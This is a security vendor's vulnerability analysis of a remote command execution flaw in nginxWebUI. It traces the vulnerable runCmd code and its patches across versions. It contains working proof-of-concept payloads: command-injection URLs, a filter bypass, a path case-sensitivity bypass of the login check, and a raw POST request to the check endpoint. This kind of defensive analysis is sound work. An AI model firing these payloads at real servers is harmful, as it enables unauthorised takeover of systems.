提交需求
    *
    *

    *
    *
    *
    立即提交
    点击”立即提交”,表明我理解并同意 《黄金城科技隐私条款》

    logo

      产品与服务
      解决方案
      技术支持
      合作发展
      关于黄金城
      申请试用
        nginxWebUI runCmd远程命令执行漏洞
        发布时间:2023-07-14 阅读次数: 1816 次

        漏洞描述

        nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载。nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,导致可在后台执行任意命令。并且该系统权限校验存在问题,导致存在权限绕过,在前台可直接调用后台接口,最终可以达到无条件远程命令执行的效果。


        影响范围:

        nginxWebUI < 3.5.2

        漏洞复现

        Poc:

        url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx

        漏洞分析(3.4.6版本)

        漏洞定位:

        根据gitee的更新历史https://gitee.com/cym1102/nginxWebUI,寻找开发者关于此漏洞的更新情况。

        以3.4.6版本为例,反编译其jar包:

        根据poc搜索/adminPage/conf,定位到路由:

        \com\cym\controller\adminPage\ConfController.class 44行

        图片

        然后根据poc的参数,找到runcmd方法

        \com\cym\controller\adminPage\ConfController.class 274行

        图片

        定义了一个runCmd方法来处理用户输入的命令并执行。根据输入的type参数,调用settingService的set方法进行设置。然后使用RuntimeUtil类来执行命令,如果是Windows系统,则使用"cmd /c start"来执行命令,如果是其他系统,则使用"/bin/sh -c"来执行命令。最后,根据执行结果返回相应的JsonResult。

        这里可以对cmd参数进行拼接,操控拼接的命令进行命令执行。

        3.4.7版本分析

        同理定位 runcmd方法:\com\cym\controller\adminPage\ConfController.class 274行

        图片

        增加了一个replaceAll方法:

        图片


        效果是对;’   \\|    //{    //}

        对这些符号做一个转义替换 、且cmd参数中要存在“nginx”字段

        构造payload:

        http://localhost:8080/AdminPage/conf/runCmd?cmd=calc%26%26nginx

        即 calc&&nginx

        3.5.2版本分析

        3.4.8升级框架为solon2

        图片

        3.5.2开发者对漏洞进行了更新

        图片


        根据gitee的版本对比,定位到:

        src/main/java/com/cym/config/AppFilter.java 

        图片

        加了一个过滤器,用于对请求进行过滤和拦截。首先,它检查请求的路径是否包含特定的文件夹(如/lib/、/js/、/doc/等),如果不包含,则调用frontInterceptor方法进行处理。接下来,它再次检查请求的路径是否包含/adminPage/,如果包含且不包含特定的文件夹,则调用adminInterceptor方法进行处理。最后,如果adminInterceptor返回false,则将请求设置为已处理。

        图片


        但是在path().toLowerCase()将路径转换为小写,第二个if下没有将路径转化成小写。

        可以在此进行大小写绕过。

        3.6.3版本分析

        \com\cym\controller\adminPage\ConfController.class 316

        图片

        图片

        定义了一个私有的isAvailableCmd(String cmd)方法,通过switch语句,根据cmd的哈希值进行匹配,判断cmd是否和预定义的命令匹配。匹配成功则返回true,即命令可用。

        相当于彻底写死,只执行预定义的、与nginx相关的命令,而不是其他命令。

        抛砖引玉:

        写完这篇文章后看到了白给师傅的poc补充,他补充了关于此漏洞的另外几个命令执行点,和文件上传点,非常牛逼,值得思考和学习。

        大佬文章:

        https://mp.weixin.qq.com/s/oKsR7bm3tleJIS675Qt0RA

        补充:

        命令执行点1

        com.cym.controller.adminPage.ConfController#reload()方法

        Payload

        http://localhost:8080/AdminPage/conf/reload?nginxExe=calc%20%7C

        命令执行点2

        com.cym.controller.adminPage.ConfController#check()方法

        Payload:


        POST /AdminPage/conf/check HTTP/1.1
        Host: 127.0.0.1:8080
        Content-Length: 151
        Accept: */*
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
        Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: SOLONID=1788f71299dc4608a355ff347bf429fa
        Connection: close
        nginxExe=calc%20%7C&json=%7B%22nginxContent%22%3A%22TES%22%2C%22subContent%22%3A%5B%22A%22%5D%2C%22subName%22%3A%5B%22A%22%5D%7D&nginxPath=C%3A%5CUsers

        命令执行点3

        com.cym.controller.adminPage.ConfController#checkBase()方法,此方法从设置中获取nginxExe nginxDir两个属性后拼接到命令再造成命令执行漏洞

        payload

        //第一步设置属性

        http://localhost:8080/AdminPage/conf/saveCmd?nginxExe=calc%20%7c&nginxPath=a&nginxDir=a

        //第二步执行命令

        http://localhost:8080/AdminPage/conf/checkBase

        任意文件上传1

        com/cym/controller/adminPage/MainController.java

        任意文件上传2

        com/cym/controller/adminPage/ServerController.java

        上一条:【漏洞通告】Linux Kernel 本地权限提升漏洞(CVE-2023-31248)
        下一条:每周黄金城官网速递???|研究人员发现ARCrypt勒索软件新变种
        免费试用
        服务热线

        马上咨询

        400-811-3777

        回到顶部
        【网站地图】【sitemap】